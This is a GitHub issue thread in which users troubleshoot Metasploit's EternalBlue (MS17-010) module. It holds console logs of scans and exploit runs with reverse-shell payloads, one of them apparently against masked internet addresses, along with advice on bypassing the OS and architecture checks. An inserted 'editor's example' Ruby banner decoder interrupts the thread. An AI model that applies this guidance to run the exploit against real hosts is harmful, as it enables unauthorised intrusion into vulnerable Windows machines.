rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

eternalblue exploit issue #8477

Closed italy2010 closed 7 years ago

italy2010 commented 7 years ago
msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.226.128:4444 
[*] 10.10.10.1:445 - Connecting to target for exploitation.
[+] 10.10.10.1:445 - Connection established for exploitation.
[*] 10.10.10.1:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.1:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.1:445 - Starting non-paged pool grooming
[+] 10.10.10.1:445 - Sending SMBv2 buffers
[+] 10.10.10.1:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.1:445 - Sending final SMBv2 buffers.
[*] 10.10.10.1:445 - Sending last fragment of exploit packet!
[*] 10.10.10.1:445 - Receiving response from exploit packet
[-] 10.10.10.1:445 - NoMethodError
[-] 10.10.10.1:445 - undefined method `[]' for nil:NilClass
[-] 10.10.10.1:445 - /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:293:in `smb1_get_response'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:188:in `smb_eternalblue'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:99:in `block in exploit'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.8/lib/active_support/core_ext/range/each.rb:7:in `each'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.8/lib/active_support/core_ext/range/each.rb:7:in `each_with_time_with_zone'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:95:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:430:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:392:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:205:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:48:in `<main>'
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > exit

OS

What OS are you running Metasploit on?

Kali 2017

cbrnrd commented 7 years ago

Do you have any additional info on the target machine? (arch, windows version, etc.)

mlshore commented 7 years ago

Same issue, on both Windows 7 Enterprise build 7601 SP1 and Windows 8.1 Enterprise build 9600 (no SP). On launching the exploit, Windows 7 throws a blue screen immediately and Windows 8 does nothing.

ghost commented 7 years ago

This should have been fixed in #8399

We can tell this example doesn't have #8399 because there is no "CORE buffer dump" for the banner string.

@mlshore we should expect the opposite behavior, i.e. 8 crashes, as we haven't put those offsets in the module yet.

drimaed commented 7 years ago
msf exploit(ms17_010_eternalblue) > use  auxiliary/scanner/smb/smb_ms17_010 
msf auxiliary(smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_ms17_010) > set rhosts 196.***.***.***
rhosts => 196.***.***.***
msf auxiliary(smb_ms17_010) > run

[-] 196.***.***.***:445      - Host does NOT appear vulnerable.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) > set rhosts 82.***.***.***
rhosts => 82.***.***.***
msf auxiliary(smb_ms17_010) > run

[+] 82.***.***.***:445    - Host is likely VULNERABLE to MS17-010!  (Windows Server (R) 2008 Standard 6002 Service Pack 2)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 82.***.***.***
rhost => 82.***.***.***
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               82.***.***.***   yes       The target address
   RPORT               445              yes       The target port (TCP)
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.***.***.***    yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.***.***.***:4444 
[*] 82.***.***.***:445 - Connecting to target for exploitation.
[+] 82.***.***.***:445 - Connection established for exploitation.
[!] 82.***.***.***:445 - Target OS selected not valid for OS indicated by SMB reply
[!] 82.***.***.***:445 - Disable VerifyTarget option to proceed manually...
[*] 82.***.***.***:445 - CORE raw buffer dump (37 bytes)
[*] 82.***.***.***:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 28  Windows Server (
[*] 82.***.***.***:445 - 0x00000010  52 29 20 32 30 30 38 20 53 74 61 6e 64 61 72 64  R) 2008 Standard
[*] 82.***.***.***:445 - 0x00000020  20 36 2e 30 00                                    6.0           
[-] 82.***.***.***:445 - Unable to continue with improper OS Target.
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.***.***.***:4444 
[*] 82.***.***.***:445 - Connecting to target for exploitation.
[+] 82.***.***.***:445 - Connection established for exploitation.
[!] 82.***.***.***:445 - Target OS selected not valid for OS indicated by SMB reply
[!] 82.***.***.***:445 - Disable VerifyTarget option to proceed manually...
[*] 82.***.***.***:445 - CORE raw buffer dump (37 bytes)
[*] 82.***.***.***:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 28  Windows Server (
[*] 82.***.***.***:445 - 0x00000010  52 29 20 32 30 30 38 20 53 74 61 6e 64 61 72 64  R) 2008 Standard
[*] 82.***.***.***:445 - 0x00000020  20 36 2e 30 00                                    6.0           
[-] 82.***.***.***:445 - Unable to continue with improper OS Target.
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > 

I hope this helps (Metasploit v4.14.22-dev).

void-in commented 7 years ago

@drimaed The target OS might be 32-bit. The module in the MSF tree right now only targets x64, as you can see from the show targets output.

ghost commented 7 years ago

@drimaed The target could possibly be 64-bit. The problem here is the kernel version is 6002, meaning it is not Server 2008 R2.

Server 2008 is based on Vista. Server 2008 R2 is Windows 7.

Vista is not currently supported.
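An editor's added example, not code from the Metasploit module or from anyone in this thread: it rebuilds the SMB native-OS banner from the "CORE raw buffer dump" that msfconsole prints and applies the version mapping given in the comment above (Vista and Server 2008 are NT 6.0 with kernel builds 6000-6002, Windows 7 and Server 2008 R2 are NT 6.1 with builds 7600/7601, Windows 8.1 is NT 6.3 with build 9600). The two sample dumps are constructed from the ones posted in this thread; the rule that only NT 6.1 fits target 0 is the editor's approximation of what VerifyTarget enforces, since the module's own match expression is not shown here.

```ruby
# Editor's added example, not Metasploit code. Rebuilds the SMB native-OS
# banner from a msfconsole "CORE raw buffer dump" and decides whether the
# host fits target 0 of ms17_010_eternalblue as discussed in this thread.

# One hex-dump row: offset, then up to 16 "xx " byte columns. The ASCII
# gutter is ignored on purpose: non-printables are shown there as '.', so
# only the hex columns are lossless.
HEX_ROW = /0x[0-9a-f]{8}\s+((?:[0-9a-f]{2}\s){1,16})/i

FAMILY = {
  '6.0' => 'Vista / Server 2008',
  '6.1' => 'Windows 7 / Server 2008 R2',
  '6.2' => 'Windows 8 / Server 2012',
  '6.3' => 'Windows 8.1 / Server 2012 R2',
}.freeze

# Kernel build numbers that a banner may carry instead of major.minor.
BUILD_TO_NT = {
  6000 => '6.0', 6001 => '6.0', 6002 => '6.0',
  7600 => '6.1', 7601 => '6.1',
  9200 => '6.2', 9600 => '6.3',
}.freeze

TARGET_0 = 'Windows 7 and Server 2008 R2 (x64) All Service Packs'

def bytes_from_dump(dump)
  dump.each_line.flat_map do |line|
    m = HEX_ROW.match(line)
    m ? m[1].split.map { |h| h.to_i(16) } : []
  end
end

# Decode the banner up to its NUL terminator (some dumps have none).
def banner_from_dump(dump)
  bytes_from_dump(dump).take_while { |b| b != 0 }.pack('C*').force_encoding('UTF-8')
end

# NT major.minor implied by the banner, or nil when neither a "6.x" string
# nor a known kernel build number is present.
def nt_version(banner)
  m = banner.match(/\b(6\.[0-3])\b/)
  return m[1] if m
  build = banner.scan(/\b\d{4}\b/).map(&:to_i).find { |b| BUILD_TO_NT.key?(b) }
  build && BUILD_TO_NT[build]
end

# Editor's approximation of the VerifyTarget rule: only NT 6.1 fits target 0.
def target_ok?(banner)
  nt_version(banner) == '6.1'
end

def explain(dump)
  banner = banner_from_dump(dump)
  ver = nt_version(banner)
  verdict = target_ok?(banner) ? 'fits target 0' : 'does not fit target 0'
  "#{banner.inspect} -> NT #{ver || '?'} (#{FAMILY.fetch(ver, 'unknown')}), #{verdict}: #{TARGET_0}"
end

# Constructed sample input, copied from the two dumps posted in this thread.
DUMP_2008 = <<~DUMP
  [*] 82.***.***.***:445 - CORE raw buffer dump (37 bytes)
  [*] 82.***.***.***:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 28  Windows Server (
  [*] 82.***.***.***:445 - 0x00000010  52 29 20 32 30 30 38 20 53 74 61 6e 64 61 72 64  R) 2008 Standard
  [*] 82.***.***.***:445 - 0x00000020  20 36 2e 30 00                                    6.0
DUMP

DUMP_WIN7 = <<~DUMP
  [*] 172.168.22.156:445 - CORE raw buffer dump (40 bytes)
  [*] 172.168.22.156:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
  [*] 172.168.22.156:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
  [*] 172.168.22.156:445 - 0x00000020  65 20 50 61 63 6b 20 31                          e Pack 1
DUMP

if $PROGRAM_NAME == __FILE__
  puts explain(DUMP_2008)
  puts explain(DUMP_WIN7)
end
```

Run it and the Server 2008 dump decodes to "Windows Server (R) 2008 Standard 6.0" (NT 6.0, rejected), while the Windows 7 dump decodes to "Windows 7 Home Basic 7601 Service Pack 1" (NT 6.1, accepted on OS; the arch check is a separate step the module does afterwards).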

amster699 commented 7 years ago

Hey bro, how can I fix this? Let me know if you can help, thanks.

msf auxiliary(smb_ms17_010) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) >

h00die commented 7 years ago

@amster699 I fixed it by wrapping your console output in ```.

amster699 commented 7 years ago

Sorry brother, I did not understand very well what you mean. Can you explain better? Thanks.

amster699 commented 7 years ago

I should also have port 4444 open, right?

amster699 commented 7 years ago

If you can leave here the commands I should use for that, I will be very thankful, brother. Thanks.

busterb commented 7 years ago

closing in favor of #8835

d1g1taltor commented 6 years ago

I know this is closed, but I would like to add that the architecture is wrong: the target system is 2008 Standard, and it needs to be 2008 R2.

jordan12121 commented 6 years ago

I ask: is it possible to exploit EternalBlue outside our Wi-Fi?

Hugovn commented 6 years ago

Same issue. Please check for me.

msf exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               172.168.22.156   yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.168.22.134   yes       The listen address (an interface may be specified)
   LPORT     445              yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 172.168.22.134:445 
[*] 172.168.22.156:445 - Connecting to target for exploitation.
[+] 172.168.22.156:445 - Connection established for exploitation.
[+] 172.168.22.156:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.168.22.156:445 - CORE raw buffer dump (40 bytes)
[*] 172.168.22.156:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 172.168.22.156:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 172.168.22.156:445 - 0x00000020  65 20 50 61 63 6b 20 31                          e Pack 1
[!] 172.168.22.156:445 - Target arch is x64, but server returned "x86"
[!] 172.168.22.156:445 - Target arch selected not valid for arch indicated by DCE/RPC reply
[!] 172.168.22.156:445 - Disable VerifyArch option to proceed manually...
[-] 172.168.22.156:445 - Unable to continue with improper OS Arch.
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/ms17_010_eternalblue) > 

bcoles commented 6 years ago

@Hugovn this issue is closed; please create a new issue.

That said, the output suggests that the target is x86, not x64. Have you tried set VerifyArch false?

[!] 172.168.22.156:445 - Target arch is x64, but server returned "x86"
[!] 172.168.22.156:445 - Target arch selected not valid for arch indicated by DCE/RPC reply
[!] 172.168.22.156:445 - Disable VerifyArch option to proceed manually...
[-] 172.168.22.156:445 - Unable to continue with improper OS Arch.

K4bl0-Skat3R commented 5 years ago

Hi guys, I have this problem after post-exploitation:

msf exploit(ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.14.247:4445 
[*] 127.0.0.1:445 - Connecting to target for exploitation.
[-] 127.0.0.1:445 - Could not make SMBv1 connection
[*] Exploit completed, but no session was created.

ykla commented 5 years ago

I ran into the same issue: timeout.

itzNikhilll commented 5 years ago

Hello guys, help! The auxiliary scanner does not check whether the target is vulnerable or not; see below:

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.xx.xxx
rhosts => 192.168.xx.xxx
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       192.168.xx.xxx                                                  yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[*] 192.168.xx.xxx:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) >

jordan12121 commented 5 years ago

445 not open.

On 6 Sep 2019 at 14:26, "Nikhil672" notifications@github.com wrote:
